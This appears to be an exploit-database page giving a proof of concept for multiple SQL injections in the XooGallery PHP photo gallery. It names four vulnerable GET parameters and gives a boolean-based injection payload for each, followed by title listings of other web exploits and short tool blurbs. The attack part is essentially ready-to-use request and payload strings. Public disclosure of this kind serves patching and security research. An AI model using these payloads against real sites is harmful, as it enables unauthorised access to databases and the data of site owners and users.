Search for hundreds of thousands of exploits

"XooGallery - Multiple SQL Injection"

Author

Exploit author

"Ahmet Ümit BAYRAM"

Platform

Exploit platform

php

Release date

Exploit published date

2019-03-26

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
# Exploit Title: XooGallery - Multiple SQL Injections
# Date: 26.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://xooscripts.com/product/html5-php-photo-gallery.html
# Demo Site: http://xooscripts.com/demos/xoogallery/
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A

----- PoC 1: SQLi -----

Request: http://localhost/[PATH]/gal.php?gal_id=1
Vulnerable Parameter: gal_id (GET)
Payload: gal_id=29' AND 2692=2692 AND 'WCFf'='WCFf

----- PoC 2: SQLi -----

Request: http://localhost/[PATH]/photo.php?photo_id=1
Vulnerable Parameter: photo_id (GET)
Payload: photo_id=1' AND 5479=5479#

----- PoC 3: SQLi -----

Request: http://localhost/[PATH]/cat.php?cat_id=1
Vulnerable Parameter: cat_id (GET)
Payload: cat_id=1' AND 9338=9338 AND 'SZIH'='SZIH


----- PoC 4: SQLi -----

Request: http://localhost/[PATH]/results.php?p=1
Vulnerable Parameter: p (GET)
Payload: p=-8412' OR 2597=2597#
Release DateTitleTypePlatformAuthor
2020-05-28"Online-Exam-System 2015 - 'fid' SQL Injection"webappsphp"Berk Dusunur"
2020-05-28"EyouCMS 1.4.6 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-28"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution"webappsphpTh3GundY
2020-05-28"NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection"webappsmultiple"Berk Dusunur"
2020-05-27"LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"Kuicms PHP EE 2.0 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-27"Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting"webappsphp"that faceless coder"
2020-05-27"osTicket 1.14.1 - 'Ticket Queue' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"OXID eShop 6.3.4 - 'sorting' SQL Injection"webappsphpVulnSpy
Release DateTitleTypePlatformAuthor
2020-05-28"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution"webappsphpTh3GundY
2020-05-28"EyouCMS 1.4.6 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-28"Online-Exam-System 2015 - 'fid' SQL Injection"webappsphp"Berk Dusunur"
2020-05-27"Kuicms PHP EE 2.0 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-27"OXID eShop 6.3.4 - 'sorting' SQL Injection"webappsphpVulnSpy
2020-05-27"osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting"webappsphp"that faceless coder"
2020-05-27"osTicket 1.14.1 - 'Ticket Queue' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-26"OpenEMR 5.0.1 - Remote Code Execution"webappsphp"Musyoka Ian"
Release DateTitleTypePlatformAuthor
2019-12-09"PRO-7070 Hazır Profesyonel Web Sitesi 1.0 - Authentication Bypass"webappsphp"Ahmet Ümit BAYRAM"
2019-07-19"Web Ofisi Rent a Car 3 - 'klima' SQL Injection"webappslinux"Ahmet Ümit BAYRAM"
2019-07-19"Web Ofisi Firma Rehberi 1 - 'il' SQL Injection"webappslinux"Ahmet Ümit BAYRAM"
2019-07-19"Web Ofisi Emlak 3 - 'emlak_durumu' SQL Injection"webappslinux"Ahmet Ümit BAYRAM"
2019-07-19"Web Ofisi Emlak 2 - 'ara' SQL Injection"webappslinux"Ahmet Ümit BAYRAM"
2019-07-19"Web Ofisi Platinum E-Ticaret 5 - 'q' SQL Injection"webappslinux"Ahmet Ümit BAYRAM"
2019-07-19"Web Ofisi E-Ticaret 3 - 'a' SQL Injection"webappslinux"Ahmet Ümit BAYRAM"
2019-07-19"Web Ofisi Firma 13 - 'oz' SQL Injection"webappslinux"Ahmet Ümit BAYRAM"
2019-04-08"Jobgator - 'experience' SQL Injection"webappsphp"Ahmet Ümit BAYRAM"
2019-04-03"Ashop Shopping Cart Software - SQL Injection"webappsphp"Ahmet Ümit BAYRAM"
2019-04-03"iScripts ReserveLogic - SQL Injection"webappsphp"Ahmet Ümit BAYRAM"
2019-04-02"Inout EasyRooms - SQL Injection"webappsphp"Ahmet Ümit BAYRAM"
2019-04-02"Inout RealEstate - 'city' SQL Injection"webappsphp"Ahmet Ümit BAYRAM"
2019-03-28"Jettweb PHP Hazır Rent A Car Sitesi Scripti V2 - 'arac_kategori_id' SQL Injection"webappsphp"Ahmet Ümit BAYRAM"
2019-03-28"Airbnb Clone Script - Multiple SQL Injection"webappsphp"Ahmet Ümit BAYRAM"
2019-03-27"Jettweb Hazır Rent A Car Scripti V4 - SQL Injection"webappsphp"Ahmet Ümit BAYRAM"
2019-03-26"XooGallery - Multiple SQL Injection"webappsphp"Ahmet Ümit BAYRAM"
2019-03-26"Jettweb Php Hazır İlan Sitesi Scripti V2 - SQL Injection"webappsphp"Ahmet Ümit BAYRAM"
2019-03-26"XooDigital - 'p' SQL Injection"webappsphp"Ahmet Ümit BAYRAM"
2019-03-26"SJS Simple Job Script - SQL Injection / Cross-Site Scripting"webappsphp"Ahmet Ümit BAYRAM"
2019-03-25"Zeeways Jobsite CMS - 'id' SQL Injection"webappsphp"Ahmet Ümit BAYRAM"
2019-03-25"Jettweb PHP Hazır Haber Sitesi Scripti V1 - SQL Injection"webappsphp"Ahmet Ümit BAYRAM"
2019-03-25"Jettweb PHP Hazır Haber Sitesi Scripti V2 - SQL Injection (Authentication Bypass)"webappsphp"Ahmet Ümit BAYRAM"
2019-03-25"Jettweb PHP Hazır Haber Sitesi Scripti V3 - SQL Injection"webappsphp"Ahmet Ümit BAYRAM"
2019-03-25"Zeeways Matrimony CMS - SQL Injection"webappsphp"Ahmet Ümit BAYRAM"
2019-03-22"Matri4Web Matrimony Website Script - Multiple SQL Injection"webappsphp"Ahmet Ümit BAYRAM"
2019-03-22"Inout Article Base CMS - SQL Injection"webappsphp"Ahmet Ümit BAYRAM"
2019-03-22"Meeplace Business Review Script - 'id' SQL Injection"webappsphp"Ahmet Ümit BAYRAM"
2019-03-21"Netartmedia Vlog System - 'email' SQL Injection"webappsphp"Ahmet Ümit BAYRAM"
2019-03-21"Bootstrapy CMS - Multiple SQL Injection"webappsphp"Ahmet Ümit BAYRAM"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46609/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.